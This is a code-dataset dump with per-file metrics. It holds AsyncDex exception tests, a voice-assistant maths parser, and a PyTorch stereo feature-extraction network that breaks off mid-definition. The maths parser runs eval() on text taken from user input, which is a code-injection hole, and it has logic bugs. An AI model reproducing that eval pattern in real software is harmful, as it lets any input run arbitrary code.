| 34.4 | 66 | 0.866279 | 26 | 172 | 5.346154 | 0.576923 | 0.115108 | 0.215827 | 0.302158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098837 | 172 | 4 | 67 | 43 | 0.896774 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
cba0b410337b88f361e08d2cdf68c638af7d89ed | 17,069 | py | Python | tests/test_exceptions.py | PythonCoderAS/AsyncDex | 1d94f11462e4f719d729b20f76e61402c48eb85a | [
"MIT"
] | null | null | null | tests/test_exceptions.py | PythonCoderAS/AsyncDex | 1d94f11462e4f719d729b20f76e61402c48eb85a | [
"MIT"
] | 1 | 2021-12-15T23:03:45.000Z | 2022-01-08T23:48:16.000Z | tests/test_exceptions.py | PythonCoderAS/AsyncDex | 1d94f11462e4f719d729b20f76e61402c48eb85a | [
"MIT"
] | null | null | null | import re
from datetime import datetime
import pytest
from aiohttp import ClientResponseError
from asyncdex import AsyncDexException, HTTPException, MangadexClient, Ratelimit
from asyncdex.constants import routes
class TestAsyncDexException:
def test_subclass(self):
assert issubclass(AsyncDexException, Exception)
exc = AsyncDexException()
assert isinstance(exc, Exception)
with pytest.raises(AsyncDexException):
raise exc
with pytest.raises(Exception):
raise exc
def test_message(self):
with pytest.raises(AsyncDexException) as exc:
raise AsyncDexException("test")
assert str(exc.value) == "test"
class TestRatelimit:
def test_subclass(self):
assert issubclass(Ratelimit, AsyncDexException)
exc = Ratelimit("a", 1, datetime.utcnow())
assert isinstance(exc, AsyncDexException)
with pytest.raises(Ratelimit):
raise exc
with pytest.raises(AsyncDexException):
raise exc
def test_message(self):
with pytest.raises(Ratelimit) as exc:
raise Ratelimit("/test", 1, datetime.fromtimestamp(int(datetime.utcnow().timestamp()) + 100))
assert re.match(r"Ratelimited for 99.\d{3} seconds on /test", str(exc.value))
def test_attrs(self):
now = datetime.utcnow()
exc = Ratelimit("a", 1, now)
assert exc.path == "a"
assert exc.ratelimit_amount == 1
assert exc.ratelimit_expires == now
class TestHTTPException:
def test_subclass(self):
assert issubclass(HTTPException, AsyncDexException)
assert issubclass(HTTPException, ClientResponseError)
exc = HTTPException("a", "a", None)
assert isinstance(exc, AsyncDexException)
assert isinstance(exc, ClientResponseError)
with pytest.raises(HTTPException):
raise exc
with pytest.raises(AsyncDexException):
raise exc
with pytest.raises(ClientResponseError):
raise exc
def test_message_no_response(self):
with pytest.raises(HTTPException) as exc:
raise HTTPException("GET", "/test", None)
assert str(exc.value) == "HTTP Error on GET for /test."
@pytest.mark.asyncio
@pytest.mark.vcr()
async def test_message_response(self):
async with MangadexClient() as client:
with pytest.raises(HTTPException) as exc:
await client.request("GET", "/fakepath" * 1000)
assert (
str(exc.value) == "HTTP 414: HTTP Error on GET for "
"https://api.mangadex.org/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath/fakepath"
"/fakepath"
"/fakepath/fakepath/fakepath."
)
@pytest.mark.asyncio
@pytest.mark.vcr()
async def test_message_response_json(self):
async with MangadexClient() as client:
r = await client.request("get", routes["ping"])
with pytest.raises(HTTPException) as exc:
raise HTTPException(
"GET", routes["ping"], response=r, json={"errors": [{"title": "Test", "detail": "This is a test."}]}
)
assert str(exc.value) == "HTTP 200: Test: This is a test."
def test_message_no_response_json(self):
with pytest.raises(HTTPException) as exc:
raise HTTPException(
"GET", routes["ping"], response=None, json={"errors": [{"title": "Test", "detail": "This is a test."}]}
)
assert str(exc.value) == "Test: This is a test."
def test_message_no_response_json_context(self):
with pytest.raises(HTTPException) as exc:
raise HTTPException(
"GET",
routes["ping"],
response=None,
json={"errors": [{"title": "Test", "detail": "This is a test.", "context": {"test": 1}}]},
)
assert str(exc.value) == "Test: This is a test. ({'test': 1})"
@pytest.mark.asyncio
@pytest.mark.vcr()
async def test_message_response_json_context(self):
async with MangadexClient() as client:
r = await client.request("get", routes["ping"])
with pytest.raises(HTTPException) as exc:
raise HTTPException(
"GET",
routes["ping"],
response=r,
json={"errors": [{"title": "Test", "detail": "This is a test.", "context": {"test": 1}}]},
)
assert str(exc.value) == "HTTP 200: Test: This is a test. ({'test': 1})"
def test_message_custom_no_locals(self):
with pytest.raises(HTTPException) as exc:
raise HTTPException("None", "None", None, msg="Test")
assert str(exc.value) == "Test"
def test_message_custom_locals(self):
with pytest.raises(HTTPException) as exc:
raise HTTPException("None", "None", None, msg="{method}: {path}")
assert str(exc.value) == "None: None"
def test_message_no_locals(self):
with pytest.raises(KeyError):
HTTPException("None", "None", None, msg="{i_do_not_exist}")
| 50.952239 | 120 | 0.647255 | 1,554 | 17,069 | 7.082368 | 0.059846 | 1.452299 | 2.176267 | 2.898782 | 0.901599 | 0.882519 | 0.85944 | 0.858532 | 0.85408 | 0.834727 | 0 | 0.002069 | 0.235398 | 17,069 | 334 | 121 | 51.10479 | 0.841238 | 0 | 0 | 0.780255 | 0 | 0 | 0.561134 | 0.471439 | 0 | 0 | 0 | 0 | 0.066879 | 1 | 0.038217 | false | 0 | 0.019108 | 0 | 0.066879 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
1db281028e6f1aa3eaf89f9fab73e1a56205f335 | 5,911 | py | Python | src/resources/maths_results.py | terminal-flow/personal-assistant | 992ee7ee4ad3107fc0b8df3ae1f0b83da855bb0a | [
"Apache-2.0"
] | 7 | 2020-07-14T20:58:14.000Z | 2021-07-14T20:54:23.000Z | src/resources/maths_results.py | terminal-flow/personal-assistant | 992ee7ee4ad3107fc0b8df3ae1f0b83da855bb0a | [
"Apache-2.0"
] | 1 | 2020-07-16T15:18:18.000Z | 2020-07-16T15:33:04.000Z | src/resources/maths_results.py | terminal-flow/personal-assistant | 992ee7ee4ad3107fc0b8df3ae1f0b83da855bb0a | [
"Apache-2.0"
] | null | null | null | import math
def math_results(text):
text_list = text.split(' ')
for i in range(len(text_list)):
if (text_list[i] == 'square' and text_list[i+1] == 'root') or text_list[i] == '√':
# check for square root and give answer
for i in range(len(text)):
try:
f_number = float(text[i:])
if str(f_number).endswith('.0'):
f_number = int(f_number)
sqrt_num = math.sqrt(f_number)
sqrt_num = round(sqrt_num, 5)
if str(sqrt_num).endswith('.0'):
sqrt_num = int(sqrt_num)
return f'the square root of {f_number} is {sqrt_num}'
break
except ValueError:
pass
for i in range(len(text_list)):
if (text_list[i] == 'the' and text_list[i+1] == 'power' and
text_list[i+2] == 'of') or ('^' == text_list[i]) or ('raised' == text_list[i] and
'to' == text_list[i+1]):
# check for x raised to the power of x and give answer
for i in range(len(text_list)):
try:
f_number = float(text_list[i])
s_number = float(text_list[-1])
if str(f_number).endswith('.0'):
f_number = int(f_number)
if str(s_number).endswith('.0'):
s_number = int(s_number)
pow_num = math.pow(f_number, s_number)
pow_num = round(pow_num, 5)
if str(pow_num).endswith('.0'):
pow_num = int(pow_num)
return f'{f_number} to the power of {s_number} is {pow_num}'
break
except ValueError:
pass
if 'squared' in text_list and 'root' not in text_list and '-' in text_list:
# check for x squared
for i in range(len(text_list)):
try:
f_number = float(text_list[i])
if str(f_number).endswith('.0'):
f_number = int(f_number)
sqrd_num = math.pow(f_number, 2)
sqrd_num = round(sqrd_num, 5)
if str(sqrd_num).endswith('.0'):
sqrd_num = int(sqrd_num)
return f'-{f_number} squared is {sqrd_num}'
break
except ValueError:
pass
elif 'squared' in text_list and 'root' not in text_list:
# check for x squared
for i in range(len(text_list)):
try:
f_number = float(text_list[i])
if str(f_number).endswith('.0'):
f_number = int(f_number)
sqrd_num = math.pow(f_number, 2)
sqrd_num = round(sqrd_num, 5)
if str(sqrd_num).endswith('.0'):
sqrd_num = int(sqrd_num)
return f'{f_number} squared is {sqrd_num}'
break
except ValueError:
pass
else:
pass
if 'cubed' in text_list and '-' in text_list:
# check for x cubed
for i in range(len(text_list)):
try:
f_number = float(text_list[i])
if str(f_number).endswith('.0'):
f_number = int(f_number)
cbd_num = math.pow(f_number, 3)
cbd_num = round(cbd_num, 5)
if str(cbd_num).endswith('.0'):
cbd_num = int(cbd_num)
return f'-{f_number} cubed is -{cbd_num}'
break
except ValueError:
pass
elif 'cubed' in text_list:
# check for x cubed
for i in range(len(text_list)):
try:
f_number = float(text_list[i])
if str(f_number).endswith('.0'):
f_number = int(f_number)
cbd_num = math.pow(f_number, 3)
cbd_num = round(cbd_num, 5)
if str(cbd_num).endswith('.0'):
cbd_num = int(cbd_num)
return f'{f_number} cubed is {cbd_num}'
break
except ValueError:
pass
else:
pass
for i in range(len(text_list)):
if (text_list[i] == '+' or text_list[i] == '-' or text_list[i] == '*'
or text_list[i] == 'x' or text_list[i] == '/'):
# check for simple equations (+, -, *, /) and give answer
for i in range(len(text)):
try:
if text[i] == '-' and (text[i+1] == type(int) or
type(float)):
text_final = text[i:]
for i in range(len(text_final)):
if text_final[i] == 'x':
text_final = str(text_final).replace('x', '*')
evaled = eval(text_final)
evaled = round(evaled, 5)
if str(evaled).endswith('.0'):
evaled = int(evaled)
return f'the answer is {evaled}'
break
else:
f_number = float(text[i])
text_final = text[i:]
for i in range(len(text_final)):
if text_final[i] == 'x':
text_final = str(text_final).replace('x', '*')
evaled = eval(text_final)
evaled = round(evaled, 5)
if str(evaled).endswith('.0'):
evaled = int(evaled)
return f'the answer is {evaled}'
break
except ValueError:
pass
return '' | 41.335664 | 90 | 0.438335 | 696 | 5,911 | 3.530172 | 0.091954 | 0.120472 | 0.069597 | 0.053724 | 0.781441 | 0.717135 | 0.713879 | 0.708995 | 0.708995 | 0.703704 | 0 | 0.010226 | 0.454069 | 5,911 | 143 | 91 | 41.335664 | 0.750852 | 0.037557 | 0 | 0.730769 | 0 | 0 | 0.064942 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007692 | false | 0.069231 | 0.007692 | 0 | 0.084615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
1de12aee1625e43ae8753b62fdaf2812ff8fd38b | 103 | py | Python | deep_dialog/usersims/__init__.py | ngduyanhece/KB-InfoBot | f472695fa083020825f799919c90a37235a5bb28 | [
"MIT"
] | 184 | 2017-04-22T18:04:46.000Z | 2022-03-08T09:32:24.000Z | deep_dialog/usersims/__init__.py | ngduyanhece/KB-InfoBot | f472695fa083020825f799919c90a37235a5bb28 | [
"MIT"
] | 5 | 2017-08-07T04:46:05.000Z | 2019-07-31T07:39:26.000Z | deep_dialog/usersims/__init__.py | ngduyanhece/KB-InfoBot | f472695fa083020825f799919c90a37235a5bb28 | [
"MIT"
] | 74 | 2017-04-21T20:09:13.000Z | 2021-09-02T16:09:05.000Z | from .usersim_rule import *
from .template_nlg import *
from .s2s_nlg import *
from .user_cmd import *
| 20.6 | 27 | 0.76699 | 16 | 103 | 4.6875 | 0.5625 | 0.4 | 0.346667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011494 | 0.15534 | 103 | 4 | 28 | 25.75 | 0.850575 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1dea10e2ccca9cb3cef768687dd0c56935a7ef99 | 19,548 | py | Python | HybridNet/feature_extraction.py | GANWANSHUI/HybridNet | a19f82c5c4c3df6e547bb4586fd1be671824f0ca | [
"MIT"
] | null | null | null | HybridNet/feature_extraction.py | GANWANSHUI/HybridNet | a19f82c5c4c3df6e547bb4586fd1be671824f0ca | [
"MIT"
] | null | null | null | HybridNet/feature_extraction.py | GANWANSHUI/HybridNet | a19f82c5c4c3df6e547bb4586fd1be671824f0ca | [
"MIT"
] | null | null | null | from __future__ import print_function
import torch
import torch.nn as nn
import torch.utils.data
#from torch.autograd import Variable
import torch.nn.functional as F
from .submodel import convbn, BasicBlock, activation_function
class PSM_feature_extraction(nn.Module):
def __init__(self):
super(PSM_feature_extraction, self).__init__()
self.inplanes = 32
self.firstconv = nn.Sequential(convbn(3, 32, 3, 2, 1, 1),
nn.ReLU(inplace=True),
convbn(32, 32, 3, 1, 1, 1),
nn.ReLU(inplace=True),
convbn(32, 32, 3, 1, 1, 1),
nn.ReLU(inplace=True))
self.layer1 = self._make_layer(BasicBlock, 32, 3, 1, 1, 1)
self.layer2 = self._make_layer(BasicBlock, 64, 16, 2, 1, 1)
self.layer3 = self._make_layer(BasicBlock, 128, 3, 1, 1, 1)
self.layer4 = self._make_layer(BasicBlock, 128, 3, 1, 1, 2)
self.branch1 = nn.Sequential(nn.AvgPool2d((64, 64), stride=(64, 64)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.branch2 = nn.Sequential(nn.AvgPool2d((32, 32), stride=(32, 32)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.branch3 = nn.Sequential(nn.AvgPool2d((16, 16), stride=(16, 16)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.branch4 = nn.Sequential(nn.AvgPool2d((8, 8), stride=(8, 8)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.lastconv = nn.Sequential(convbn(320, 128, 3, 1, 1, 1),
nn.ReLU(inplace=True),
nn.Conv2d(128, 32, kernel_size=1, padding=0, stride=1, bias=False))
def _make_layer(self, block, planes, blocks, stride, pad, dilation):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion), )
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, pad, dilation))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, 1, None, pad, dilation))
return nn.Sequential(*layers)
def forward(self, x):
output = self.firstconv(x)
output = self.layer1(output)
output_raw = self.layer2(output)
output = self.layer3(output_raw)
output_skip = self.layer4(output)
output_branch1 = self.branch1(output_skip)
output_branch1 = F.upsample(output_branch1, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch2 = self.branch2(output_skip)
output_branch2 = F.upsample(output_branch2, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch3 = self.branch3(output_skip)
output_branch3 = F.upsample(output_branch3, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch4 = self.branch4(output_skip)
output_branch4 = F.upsample(output_branch4, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_feature = torch.cat(
(output_raw, output_skip, output_branch4, output_branch3, output_branch2, output_branch1), 1)
output_feature = self.lastconv(output_feature)
return output_feature
class PSM_UNet_S_2_feature(nn.Module):
def __init__(self):
super(PSM_UNet_S_2_feature, self).__init__()
self.inplanes = 16
self.inplanes2 = 32
self.inplanes4 = 64
self.inplanes10 = 160
self.firstconv = nn.Sequential(convbn(3, self.inplanes, 3, 2, 1, 1),
activation_function(),
#nn.ReLU(inplace=True),
convbn(self.inplanes, self.inplanes, 3, 1, 1, 1),
activation_function(),
#nn.ReLU(inplace=True),
convbn(self.inplanes, self.inplanes, 3, 1, 1, 1),
activation_function(),
#nn.ReLU(inplace=True)
)
self.layer1 = self._make_layer(BasicBlock, self.inplanes, 3, 1, 1, 1)
self.layer2 = self._make_layer(BasicBlock, self.inplanes2, 16, 2, 1, 1)
self.layer3 = self._make_layer(BasicBlock, self.inplanes4, 3, 1, 1, 1)
self.layer4 = self._make_layer(BasicBlock, self.inplanes4, 3, 1, 1, 2)
self.branch1 = nn.Sequential(nn.AvgPool2d((64, 64), stride=(64, 64)),
convbn(128 // 2, 32 // 2, 1, 1, 0, 1),
activation_function(),
#nn.ReLU(inplace=True)
)
self.branch2 = nn.Sequential(nn.AvgPool2d((32, 32), stride=(32, 32)),
convbn(128 // 2, 32 // 2, 1, 1, 0, 1),
activation_function(),
#nn.ReLU(inplace=True)
)
self.branch3 = nn.Sequential(nn.AvgPool2d((16, 16), stride=(16, 16)),
convbn(128 // 2, 32 // 2, 1, 1, 0, 1),
activation_function(),
#nn.ReLU(inplace=True)
)
self.branch4 = nn.Sequential(nn.AvgPool2d((8, 8), stride=(8, 8)),
convbn(128 // 2, 32 // 2, 1, 1, 0, 1),
activation_function(),
#nn.ReLU(inplace=True)
)
self.lastconv = nn.Sequential(convbn(320 // 2, 128 // 2, 3, 1, 1, 1),
activation_function(),
#nn.ReLU(inplace=True),
nn.Conv2d(128 // 2, 32, kernel_size=1, padding=0, stride=1, bias=False))
self.up_sample_1 =nn.Sequential( nn.ConvTranspose2d(32, 32, 3, 2, 1, output_padding=1, bias=False))
self.up_sample_2 = nn.Sequential( nn.ConvTranspose2d(16, 16, 3, 2, 1, output_padding=1, bias=False))
self.output_feature_2 = nn.Sequential(convbn(48, 16, 3, 1, 1, 1),
activation_function(),
#nn.ReLU(inplace=True),
convbn(16, 16, 3, 1, 1, 1),
activation_function(),
convbn(16, 16, 3, 1, 1, 1),
activation_function(),
convbn(16, 16, 3, 1, 1, 1),
activation_function(),
#nn.ReLU(inplace=True),
nn.Conv2d(16, 16, kernel_size=1, padding=0, stride=1, bias=False),
#nn.ReLU(inplace=True)
)
self.output_CSPN = nn.Sequential(
convbn(16 , 16, 3, 1, 1, 1),
#nn.ReLU(inplace=True),
activation_function(),
convbn(16, 16, 3, 1, 1, 1),
# nn.ReLU(inplace=True),
activation_function(),
convbn(16, 16, 3, 1, 1, 1),
#nn.ReLU(inplace=True),
activation_function(),
convbn(16, 8, 3, 1, 1, 1),
#nn.ReLU(inplace=True),
activation_function(),
